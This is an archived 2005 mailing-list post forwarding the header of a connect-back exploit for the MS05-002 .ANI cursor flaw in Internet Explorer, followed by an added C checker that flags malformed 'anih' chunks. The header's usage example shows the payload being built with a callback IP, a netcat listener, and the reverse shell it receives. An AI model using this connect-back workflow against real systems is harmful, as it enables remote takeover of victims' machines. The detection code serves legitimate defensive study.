Vulnerability Development mailing list archives
Fwd: MS05-002 xploit modification - connectback addition
From: Benn Goldman Rivers <benoror () gmail com>
Date: Sun, 30 Jan 2005 04:59:13 -0600
Filename with greetings ... sorry

On Sun, 30 Jan 2005 00:41:16 -0600, <benoror () gmail com> wrote:
/* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 WhiskyCoders.
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049)
 *
 * WhiskyCoders - http://bennupg.ath.cx
 * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew
 *
 * (universal -- for all affected systems)
 * ---------------------------------------------------------------------
 * Notes:
 * This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
 * http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
 * ---------------------------------------------------------------------
 * Description:
 * A remote code execution vulnerability exists in the way that
 * cursor, animated cursor, and icon formats are handled. An attacker
 * could try to exploit the vulnerability by constructing a malicious
 * cursor or icon file that could potentially allow remote code
 * execution if a user visited a malicious Web site or viewed a
 * malicious e-mail message. An attacker who successfully exploited
 * this vulnerability could take complete control of an affected
 * system.
 *
 * ---------------------------------------------------------------------
 * Patch:
 * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 * - Windows Server 2003
 * - Windows XP SP1
 * - Windows XP SP0
 * - Windows 2000 SP4
 * - Windows 2000 SP3
 * - Windows 2000 SP2
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++ : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
 * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
 * Linux : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * **ATTACKER:
 *
 * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * d00d@whiskybox $ netcat -l -p 7778 -v
 *
 * **VICTIM:
 *
 * C:\> iexplore C:\poc.html
 *
 * **ATTACKER:
 * d00d@whiskybox $ netcat -l -p 7778 -v
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\Documents and Settings\Administrator\Desktop>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission to
 * do so.
 *
 */
Attachment:
WC-ms05002-ani-expl-cb.c
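The header above only says that malformed cursor/icon files trigger the bug and shows the attacker/victim flow; it does not show what a malformed .ANI looks like or how a scanner would spot one. The following is an added example written for this page, not code from the WhiskyCoders or houseofdabus exploits: a small C checker that walks the RIFF chunk list of an ACON file and flags an "anih" chunk whose declared length differs from the 36-byte ANIHEADER structure. That 36-byte signature is an assumption taken from the public analysis of MS05-002, not something stated in the post; the sample files the block builds are constructed test input, not real cursors, and the function and file names are mine.

```c
/*
 * ani_anih_check.c: walk the RIFF chunk list of a .ANI (form type "ACON")
 * file and flag any "anih" chunk whose declared length is not the 36 bytes
 * that the ANIHEADER structure occupies. Added example; not part of the
 * WhiskyCoders/houseofdabus exploit. The 36-byte signature is an assumption
 * taken from the public analysis of MS05-002, not from the post above.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ANIH_EXPECTED_SIZE 36u   /* sizeof(ANIHEADER); assumed, see lead-in */

static uint32_t rd32(const uint8_t *p)   /* little-endian, as RIFF stores lengths */
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/*
 * Returns  1 if an anih chunk with a non-36-byte declared length is found
 *            (its declared length is stored in *bad_size when non-NULL),
 *          0 if every anih chunk has the expected size,
 *         -1 if the buffer is not a well-formed RIFF/ACON file.
 */
int ani_check(const uint8_t *buf, size_t len, uint32_t *bad_size)
{
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return -1;

    size_t pos = 12;                          /* first chunk after the RIFF header */
    while (pos + 8 <= len) {                  /* need a full 8-byte chunk header */
        const uint8_t *ck = buf + pos;
        uint32_t size = rd32(ck + 4);

        if (memcmp(ck, "anih", 4) == 0 && size != ANIH_EXPECTED_SIZE) {
            if (bad_size) *bad_size = size;   /* the length a trusting parser would copy */
            return 1;
        }
        if (memcmp(ck, "LIST", 4) == 0) {     /* LIST: skip header + list type, descend */
            pos += 12;
            continue;
        }
        /* chunk data is padded to an even length; a declared size larger than
           what remains means the file is truncated (or lying), so stop there */
        size_t advance = (size_t)size + (size & 1u);
        if (advance > len - pos - 8)
            return -1;
        pos += 8 + advance;
    }
    return 0;
}

/*
 * Build a minimal ACON file into `out`: RIFF header followed by one anih
 * chunk. `declared` goes into the chunk header; `actual` bytes of data
 * really follow it. Constructed test input, not a real cursor.
 * Returns the total length, or 0 if `out` cannot hold it.
 */
size_t build_ani(uint8_t *out, size_t cap, uint32_t declared, uint32_t actual)
{
    size_t total = 12 + 8 + (size_t)actual + (actual & 1u);
    if (total > cap)
        return 0;
    memset(out, 0, total);
    memcpy(out, "RIFF", 4);
    wr32(out + 4, (uint32_t)(total - 8));
    memcpy(out + 8, "ACON", 4);
    memcpy(out + 12, "anih", 4);
    wr32(out + 16, declared);
    if (actual >= 4)
        wr32(out + 20, ANIH_EXPECTED_SIZE);   /* cbSize, first ANIHEADER field */
    return total;
}

/* Build a sample whose anih header declares `declared` bytes but carries a
   real 36-byte body, then run the check on it. */
int check_built_sample(uint32_t declared, uint32_t *bad_size)
{
    uint8_t tmp[128];
    size_t n = build_ani(tmp, sizeof tmp, declared, ANIH_EXPECTED_SIZE);
    return n ? ani_check(tmp, n, bad_size) : -1;
}

int main(int argc, char **argv)
{
    static uint8_t buf[1u << 20];
    size_t n;
    if (argc < 2) {                           /* no file: check a constructed bad sample */
        n = build_ani(buf, sizeof buf, 0x1000, ANIH_EXPECTED_SIZE);
    } else {
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 2; }
        n = fread(buf, 1, sizeof buf, f);
        fclose(f);
    }
    uint32_t bad = 0;
    int r = ani_check(buf, n, &bad);
    if (r == 1)
        printf("SUSPICIOUS: anih chunk declares %u bytes (expected %u)\n",
               (unsigned)bad, (unsigned)ANIH_EXPECTED_SIZE);
    else if (r == 0)
        puts("ok: every anih chunk is 36 bytes");
    else
        puts("not a well-formed RIFF/ACON file");
    return r == 1 ? 1 : 0;
}
```

Compile with `gcc -o ani_anih_check ani_anih_check.c` and run it against a .ANI file (or with no argument to see the constructed oversized sample flagged). The check deliberately tests the declared length before the truncation test, because a file whose anih header claims more bytes than actually follow is exactly the shape a parser that trusts the header length gets hurt by.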